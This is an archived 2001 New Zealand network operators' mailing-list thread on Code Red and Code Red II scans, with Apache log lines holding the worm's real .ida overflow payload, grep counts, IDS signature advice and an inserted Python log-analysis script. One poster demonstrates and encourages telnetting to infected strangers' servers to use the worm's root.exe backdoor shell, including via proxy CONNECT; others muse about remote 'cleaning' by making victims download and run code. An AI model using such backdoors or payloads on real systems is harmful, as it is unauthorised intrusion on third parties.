I'm getting lots of hits on my home box, unfortunately. 142 since August 1 is the latest count. :-(

Noticed that the GET requests look different now:

203.231.234.229 - - [05/Aug/2001:11:46:35 +1200] "GET /default.ida?XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX XXXXXXXXXXXXXXXXXXXXX%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9 090%u6858%ucbd3%u7801%u9090%u9090%u8190%u00c3%u0003%u8b00%u531b%u53ff%u0 078%u0000%u00=a HTTP/1.0" 404 283 "-" "-"

Whereas earlier on, they looked like this:

65.192.84.7 - - [05/Aug/2001:06:51:26 +1200] "GET /default.ida?NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN NNNNNNNNNNNNNNNNNNNNNNNNNNN NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN NNNNNNNNNNNNNNNNN%u9090%u68 58%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u90 90%u8190%u00c3%u0003%u8b00% u531b%u53ff%u0078%u0000%u00=a HTTP/1.0" 400 330 "-" "-"

-- Juha Saarinen

--------- To unsubscribe from nznog, send email to majordomo(a)list.waikato.ac.nz where the body of your message reads: unsubscribe nznog
On 5 Aug 2001, at 11:53, Juha Saarinen wrote:
I'm getting lots of hits on my home box, unfortunately. 142 since August 1 is the latest count. :-(
Noticed that the GET requests look different now:
[snip]

Some look different:

[dan(a)dev:/var/log] $ grep -c "default.ida?X" /var/log/httpd-access.log
12
[dan(a)dev:/var/log] $ grep -c "default.ida?N" /var/log/httpd-access.log
116
[dan(a)dev:/var/log] $ grep -c "default.ida" /var/log/httpd-access.log
128

The above represents the last 24 hours EST. All hits were against the IP address, not against any known domain (i.e. the HTTP headers did not include a domain name).

-- Dan Langille pgpkey - finger dan(a)unixathome.org | http://unixathome.org/finger.php
Juha brings up a good point here. Notice that these two strings LOOK different but the garbage (shell code) at the end is in fact the same.

These are after all buffer overflow exploits, which means that they fill up an input buffer so that it overflows and then insert some code to run at the end. So all the NNNNNNNN in the original exploit was doing was just taking up space in the buffer until it was overflowing and the shell code (the assembly code that runs and does the actual work) was inserted at the end.

As such (and as a later email hints at) you should not have set up NNNNNNN as a trigger for your IDS. Set up a part of the shellcode instead. Do some research; it is extremely likely that the shellcode will be inserted at the exact same place in the packet regardless of what the first buffer-filling text is.

Hope this helps

Dean

On Sun, Aug 05, 2001 at 11:53:09AM +1200, Juha Saarinen wrote:
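Dean's point above (trigger on the shellcode tail, not on the N/X filler) and Dan's three grep counts can be folded into one small log-processing script. What follows is an added example written for this page; it is not Chris's attached hack nor anything posted in the thread. It parses Apache common/combined log lines, classifies /default.ida requests by their filler character, checks that the N and X variants carry the identical %u tail, decodes that tail into the raw bytes the overflow delivers (each %uXXXX is a 16-bit unit stored little-endian, so %u9090 becomes two 0x90 bytes, the x86 NOP opcode), and emits the leading units as a filler-independent content signature. The sample log lines are constructed (RFC 5737 documentation addresses, filler shortened to 40 characters); the tail itself is copied from the posted log lines, and the padding of the truncated final %u00 to a full 16-bit unit is an assumption.

```python
import re
from collections import Counter

# The %u-encoded tail exactly as it appears in both posted log lines (N and X variants).
IDA_TAIL = ("%u9090%u6858%ucbd3%u7801" * 3
            + "%u9090%u9090%u8190%u00c3%u0003%u8b00%u531b%u53ff%u0078%u0000%u00")

# Constructed sample log, modelled on the lines posted in the thread. The IPs
# are RFC 5737 documentation addresses and the filler is shortened to 40
# characters; the real requests carry a few hundred N or X bytes before the tail.
SAMPLE_LOG = "\n".join([
    f'203.0.113.7 - - [05/Aug/2001:11:46:35 +1200] "GET /default.ida?{"X" * 40}{IDA_TAIL}=a HTTP/1.0" 404 283 "-" "-"',
    f'198.51.100.9 - - [05/Aug/2001:06:51:26 +1200] "GET /default.ida?{"N" * 40}{IDA_TAIL}=a HTTP/1.0" 400 330 "-" "-"',
    f'198.51.100.23 - - [05/Aug/2001:07:15:02 +1200] "GET /default.ida?{"N" * 40}{IDA_TAIL}=a HTTP/1.0" 400 330 "-" "-"',
    '192.0.2.44 - - [05/Aug/2001:07:02:11 +1200] "GET /index.html HTTP/1.0" 200 1043 "-" "Mozilla/4.0"',
])

# Apache common/combined log format: the request line is the quoted field after the timestamp.
CLF_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<uri>\S+) (?P<proto>[^"]+)" '
    r'(?P<status>\d{3}) (?P<size>\S+)'
)

# /default.ida?<filler><%u tail>=a : filler is the run of N or X, tail is the shellcode.
IDA_RE = re.compile(
    r'^/default\.ida\?(?P<filler>[A-Za-z]*)(?P<tail>(?:%u[0-9A-Fa-f]{1,4})+)=a$'
)
UNIT_RE = re.compile(r'%u([0-9A-Fa-f]{1,4})')


def parse_clf(line):
    """Parse one access-log line into its fields; None if it is not CLF."""
    m = CLF_RE.match(line)
    return m.groupdict() if m else None


def classify_ida(uri):
    """Return (variant, tail) for a /default.ida overflow request, else None.

    variant is the filler character ('N' for the original Code Red requests,
    'X' for the newer ones seen in the thread) or '?' if the filler is mixed.
    """
    m = IDA_RE.match(uri)
    if not m:
        return None
    filler_chars = set(m.group("filler"))
    variant = filler_chars.pop() if len(filler_chars) == 1 else "?"
    return variant, m.group("tail")


def decode_u(tail):
    """Turn the %uXXXX run into the bytes the overflow delivers.

    The .ida handler treated each %uXXXX as one 16-bit wide character, and
    wide characters are stored little-endian on x86, so %u6858 becomes 58 68.
    Assumption: the truncated final %u00 is padded to a full 16-bit unit.
    """
    out = bytearray()
    for hexval in UNIT_RE.findall(tail):
        out += int(hexval, 16).to_bytes(2, "little")
    return bytes(out)


def signature(tail, units=4):
    """Leading %u units of the tail: a filler-independent IDS content match."""
    return "".join("%u" + h for h in UNIT_RE.findall(tail)[:units])


def summarize(log_text):
    """Count overflow attempts per variant and per source, and collect the
    distinct tails seen so the variants' shellcode can be compared."""
    variants, sources, tails = Counter(), Counter(), set()
    for line in log_text.splitlines():
        rec = parse_clf(line)
        hit = classify_ida(rec["uri"]) if rec else None
        if not hit:
            continue
        variant, tail = hit
        variants[variant] += 1
        sources[rec["ip"]] += 1
        tails.add(tail)
    return variants, sources, tails


if __name__ == "__main__":
    variants, sources, tails = summarize(SAMPLE_LOG)
    print("attempts per variant:", dict(variants))
    print("attempts per source: ", dict(sources))
    print("distinct shellcode tails:", len(tails))
    for tail in tails:
        print("IDS content match:", signature(tail))
        print("decoded bytes:    ", decode_u(tail).hex(" "))
```

Run it as a script to see the per-variant and per-source counts for the sample, or feed summarize() the contents of your own access log to get Dan's three grep counts in one pass plus the list of distinct tails. One caveat: Apache's %r records only the request line, so the bytes you recover this way are exactly what the log holds and nothing more; the full packet Chris asks for later in the thread still needs a tcpdump capture.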
On Sun, Aug 05, 2001 at 11:53:09AM +1200, Juha Saarinen wrote:

I'm getting lots of hits on my home box, unfortunately. 142 since August 1 is the latest count. :-(

The initial bytes are filler bytes, which means the overflow can be less precise (they are effectively nops). Attached is a hack I wrote to pull these things apart from a long file.

If anyone has any really good (non-truncated) log entries, I'd be interested.

--cw
On Sun, 5 Aug 2001, Chris Wedgwood wrote:
The initial bytes are filler bytes which mean the overflow can be less precises (they are effectively nops). Attached is a hack I wrote to pull these things apart from a long file.
One thing I have noticed is that the 'X' version no longer sends broken headers and, rather than a 400 error, it's now getting a 404.
If anyone has any really good (non-truncated) log entries, I'd me interested.
I have fairly good logs from my two IPs. I will email them to you if you like, or something.

Incidentally, the X ones outnumber the N ones, 337 to 188 as of this moment. The first X one was at 00:05:02 NZST today. Which means that variant seems to be much more active, I guess.

-- Dylan Reeve - dylan(a)wibble.net "Um, yeah."
On Sun, Aug 05, 2001 at 10:54:47PM +1200, Dylan Reeve wrote:

I have fairly good logs from my two IPs. I will email them to you if you like, or something.

Sure thing... apache seems to truncate the logs to pretty much what Juha posted? Have you any more than this?

--cw
On Sun, 5 Aug 2001, Chris Wedgwood wrote:
On Sun, Aug 05, 2001 at 10:54:47PM +1200, Dylan Reeve wrote:
I have fairly good logs from my two IPs. I will email them to you if you like, or something.
Sure thing... apache seems to truncate the logs to pretty much what Juha posted? Have you any more than this?
No, only apache logs, although I believe that is all that is contained in the HTTP request itself; not sure what other traffic comes along with it. My collection however is growing at about 1 every 30 seconds.

-- Dylan Reeve - dylan(a)wibble.net "Um, yeah."
On Sun, Aug 05, 2001 at 11:05:58PM +1200, Dylan Reeve wrote:

My collection however is growing at about 1 every 30 seconds.

Can you do something like:

tcpdump -wflah.pcap -s2000 port 80

on the said machine and after you've collected a few such attempts email me the file?

--cw
Dylan or me?

-- Juha

:: -----Original Message-----
:: From: Chris Wedgwood [mailto:cw(a)f00f.org]
:: Sent: Sunday, 5 August 2001 23:10
:: To: Dylan Reeve
:: Cc: Juha Saarinen; nznog(a)list.waikato.ac.nz
:: Subject: Re: Different Code Red?
::
:: Can you do something like:
::
:: tcpdump -wflah.pcap -s2000 port 80
::
:: on the said machine and after you've collected a few such attempts
:: email me the file?
On Sun, Aug 05, 2001 at 10:54:47PM +1200, Dylan Reeve wrote:
I have fairly good logs from my two IPs. I will email them to you if you like, or something.
Sure thing... apache seems to truncate the logs to pretty much what Juha posted? Have you any more than this?
We've got a counter on it at wlug.linuxcare.co.nz/codered.php; I'm fascinated by this worm. There's a brief breakdown of how it works and the binary at http://www.unixwiz.net/techtips/CodeRedII.html

-- 5.4 billion people haven't chosen their preferred OS yet..
Incidentially, the X ones outnumber the N ones, 337 to 188 as of this moment. The first X one was at 00:05:02 NZST today. Which means that varient seems to be much more active, I guess.
It's a new worm using the same infection vector. It is a lot more aggressive, and uses the fact that machines near to itself are likely to be good places to find crackable machines. If you have a lot of customers with cracked NT boxes you'll get a lot of scans. If you have a nice C space in the middle of nowhere with no windows machines anywhere near, you might have a rather boring night.

http://www.unixwiz.net/techtips/CodeRedII.html has some preliminary discussion on it and covers most of the important pieces of information.

This version also copies CMD.EXE into the scripts directory and so now any infected machine is wide, wide open. Apparently there has been some discussion on NTBUGTRAQ about it. (http://slashdot.org/comments.pl?sid=01/08/05/0433219&cid=494).

Place your bets how long before code Red III is around?
On Sun, Aug 05, 2001 at 11:39:27PM +1200, Perry Lorier wrote:

It's a new worm using the same infection vector. It is a lot more aggressive, and uses the fact that machines near to itself are likely to be good places to find crackable machines. If you have a lot of customers with cracked NT boxes you'll get a lot of scans. If you have a nice C space in the middle of nowhere with no windows machines anywhere near, you might have a rather boring night.

Hey, and it leaves a cool backdoor floating about. Look for recent infectors and telnet to them like such:

cw:0(a)weta(cw)$ telnet x.x.x.x 80
Trying x.x.x.x...
Connected to x.x.x.x.
Escape character is '^]'.
get /scripts/root.exe HTTP/0.9

HTTP/1.1 200 OK
Server: Microsoft-IIS/5.0
Date: Sun, 05 Aug 2001 11:39:46 GMT
Content-Type: application/octet-stream
Microsoft Windows 2000 [Version 5.00.2195]
(C) Copyright 1985-1999 Microsoft Corp.

c:\inetpub\scripts>

Cool :)

Start grepping those proxy logs people for lusers attempting to do this (it won't work via a proxy anyhow, but that's no reason not to hunt down the offending luser and beat them senseless).

--cw
On Sun, Aug 05, 2001 at 11:46:43PM +1200, Chris Wedgwood wrote:

Start grepping those proxy logs people for lusers attempting to do this (it won't work via a proxy anyhow, but that's no reason not to hunt down the offending luser and beat them senseless).

Actually, about 2 seconds thought will show it's trivial to make this work via a proxy, simply use CONNECT host:port ...

--cw
It's a new worm using the same infection vector. It is a lot more aggressive, and uses the fact that machines near to itself are likely to be good places to find crackable machines. If you have a lot of customers with cracked NT boxes you'll get a lot of scans. If you have a nice C space in the middle of nowhere with no windows machines anywhere near, you might have a rather boring night.
Hey, and it leaves a cool backdoor floating about. Look for recent infectors and telnet to them like such:
Well, I wasn't going to be so blatantly obvious about it :) <shnip>
Cool :)
Heh, lotsa fun ;)
Start grepping those proxy logs people for lusers attempting to do this
Hrm, good point.
(it won't work via a proxy anyhow, but that's no reason not to hunt down the offending luser and beat them senseless).
You can. Although I'm not going to give out explicit instructions how on a public mailing list :P So if you have a proxy between you and the internet it's not going to save you from people playing with your recently backdoored IIS server.

-- It's all in the mind, ya know.
On Mon, Aug 06, 2001 at 12:20:11AM +1200, Perry Lorier wrote:

You can. Although I'm not going to give out explicit instructions how on a public mailing list :P So if you have a proxy between you and the internet it's not going to save you from people playing with your recently backdoored IIS server.

too late, see my next message :)

Also, you _cannot_ scan for these as borked stuff like WinGate tends to use CONNECT when it doesn't need to anyhow (thus defeating proxying too).

--cw
At 00:11 6/08/2001, Chris Wedgwood wrote:
On Mon, Aug 06, 2001 at 12:20:11AM +1200, Perry Lorier wrote:
You can. Although I'm not going to give out explicit instructions how on a public mailing list :P So if you have a proxy between you and the internet it's not going to save you from people playing with your recently backdoored IIS server.
too late, see my next message :)
Also, you _cannot_ scan for these as borked stuff like WinGate tends to use CONNECT when it doesn't need to anyhow (thus defeting proxying too).
so how hard would it be to write a cleaning agent ? even if it were a "shutdown server and leave a message 'you have been hacked, please patch your machine' " on their screen ? you could then automate cleaning out machines :)

from the number of hits I am getting from korean/asian IP's it may pay for some clever cookie (joe could write it in AWK ?) to put the message in Cantonese/Mandarin as well :)

-- Steve.
On Mon, Aug 06, 2001 at 01:18:56AM +1200, Steve Phillips wrote:

so how hard would it be to write a cleaning agent ?

not hard -- it's just a matter of time :)

have it download an executable from a known location and execute it... that executable could then apply relevant patches and reboot (since you have to write an executable, may as well put the hard logic in there)

even if it were a "shutdown server and leave a message 'you have been hacked, please patch your machine' " on their screen ?

and get sued :)

from the number of hits I am getting from korean/asian IP's it may pay for some clever cookie (joe could write it in AWK ?) to put the message in Cantonese/Mandarin as well :)

Nah, China officially said they weren't infected. You must be wrong :)

There was a break down of infected hosts by AS last time, I expect we'll see another soon, I think 4648 and 4768 were the two worst affected ASs in NZ, about 20 odd hosts in the former and under 10 in the latter, everyone else was single figures. Since, I assume, most NZ web-servers were set to a locale other than US English, presumably very few were defaced and went undetected for some time.

--cw
:: There was a break down of infected hosts by AS last time, I expect
:: we'll see another soon, I think 4648 and 4768 were the two worst
:: affected ASs in NZ, about 20 odd hosts in the former and under 10 in
:: the latter, eveyone else was single figures. Since, I assume, most NZ
:: web-servers were set to a locale other than US English, presumably
:: very few were defaced and went undetected for some time.

The hits that I've logged are mostly from 203.79.x.x (219 out of 371) which is unfortunately the range my IP address is in. Kerrap! :-(

-- Juha
Hi all

I have looked on our router and am seeing up to 100 attempts per minute from Code Red Vers. II virus scanning our network looking for other machines to infect.

Is anyone else seeing such a high scan rate?

Can anything be done about it?

Over the last 3 hours, the frequency of attempts increased by 50%.
Matt Law
Network Engineer
Voyager NZ Ltd
DDI +649 4439 443
PGP Public Key available http://www.voyager.co.nz/~mat/public-key.asc
431 attempts so far.

Is there anything ISPs (Paradise in my case) could do to filter out the damned thing?

-- Juha
At 12:59 PM +1200 6/8/01, Juha Saarinen wrote:
431 attempts so far.
Is there anything ISPs (Paradise in my case) could do to filter out the damned thing?
Oh! But that would be censorship!!!

-- Andrew P. Gardner barcelona.com stolen, stmoritz.com stays. What's uniform about the UDRP? We could ask ICANN to send WIPO a clue, but do they have any to spare? Get active: http://www.tldlobby.com
489 here. Same ISP.

I suppose a lot of IP's in our class A are infected?

At 12:59 6/08/2001 +1200, Juha Saarinen wrote:
431 attempts so far.
Is there anything ISPs (Paradise in my case) could do to filter out the damned thing?
Yeah, most come from 203.79.x.x boxes.

-- Juha

:: -----Original Message-----
:: From: Mark Foster [mailto:blakjak(a)blakjak.net]
:: Sent: Monday, 6 August 2001 13:07
:: To: Juha Saarinen; nznog(a)list.waikato.ac.nz
:: Subject: RE: Different Code Red?
::
:: 489 here. Same ISP.
:: I suppose a lot of IP's in our class A are infected?
I have looked on our router and am seeing up to 100 attempts per minute from Code Red Vers. II virus scanning our network looking for other machines to infect.
Is anyone else seeing such a high scan rate?
Can anything be done about it?
Over the last 3 hours, the frequency of attempts increased by 50%.
Well, you could telnet to the handy back door now installed on each attacking machine and shut it down (expect script anyone?) :-)

Oh, that's right, we can't :(

We're seeing about 6 attacks per hour per IP address. This has been a pretty stable level for about 18 hours. First attack by this version, ~10pm on Saturday, reached the current level by about 5pm Sunday.

Aaron.
# cat /var/log/httpd/access_log | grep -c default.ida
371

Aaaiieee!!!

-- Juha
On 6 Aug 2001, at 9:04, Juha Saarinen wrote:
# cat /var/log/httpd/access_log | grep -c default.ida
371
109. 73 of those since midnight.

Slainte

Gordon

--- Gordon Findlay Manager, Information Technology Services Christchurch College of Education, PO Box 31065, Christchurch, New Zealand email: gordon.findlay(a)cce.ac.nz phone +64 3 343 7766, mobile 021 358 788 -These views are mine: the College may agree, by coincidence.-
At 09:34 6/08/2001 +1200, you wrote:
On 6 Aug 2001, at 9:04, Juha Saarinen wrote:
# cat /var/log/httpd/access_log | grep -c default.ida
371
109. 73 of those since midnight.
One of our servers has had 243 attempts. only 13 of those were the new version. bah.. make that 244 errrr 245.. Sigh. and they won't let me block port 80 yet.. :/

Laters, Brodie Davis

P.S anyone have any ideas why my snort process keeps falling off the planet.. all the logs say is that the interface left promiscuous mode..:/
If anyone has any really good (non-truncated) log entries, I'd be interested.
Sun Aug 5 07:20:15 2001 ---.238.92.162 GET /default.ida?NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN N%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090% u9090%u8190%u00c3%u0003%u8b00%u531b%u53ff%u0078%u0000%u00=a HTTP/1.0
Sun Aug 5 06:34:58 2001 ---.175.176.252 GET /default.ida?XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX X%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090% u9090%u8190%u00c3%u0003%u8b00%u531b%u53ff%u0078%u0000%u00=a HTTP/1.0
100's more if you want them.

----------------------------------------------------------------------------
Tony McGregor                    Mail: T.McGregor(a)cs.waikato.ac.nz
Department of Computer Science   Phone: +64 7 838 4651
Waikato University               Fax: +64 7 858 5095
Private Bag 3105                 Home: +64 7 825 5040 mobile: (021)313004
Hamilton, New Zealand            www: http://www.cs.waikato.ac.nz/~tonym
----------------------------------------------------------------------------
participants (15)

- Aaron Roydhouse
- Andy Gardner
- Brodie Davis
- Bruce Kingsbury
- Chris Wedgwood
- Dan Langille
- Dean Pemberton
- Dylan Reeve
- Gordon Findlay
- Juha Saarinen
- Mark Foster
- mat@voyager.co.nz
- Perry Lorier
- Steve Phillips
- Tony McGregor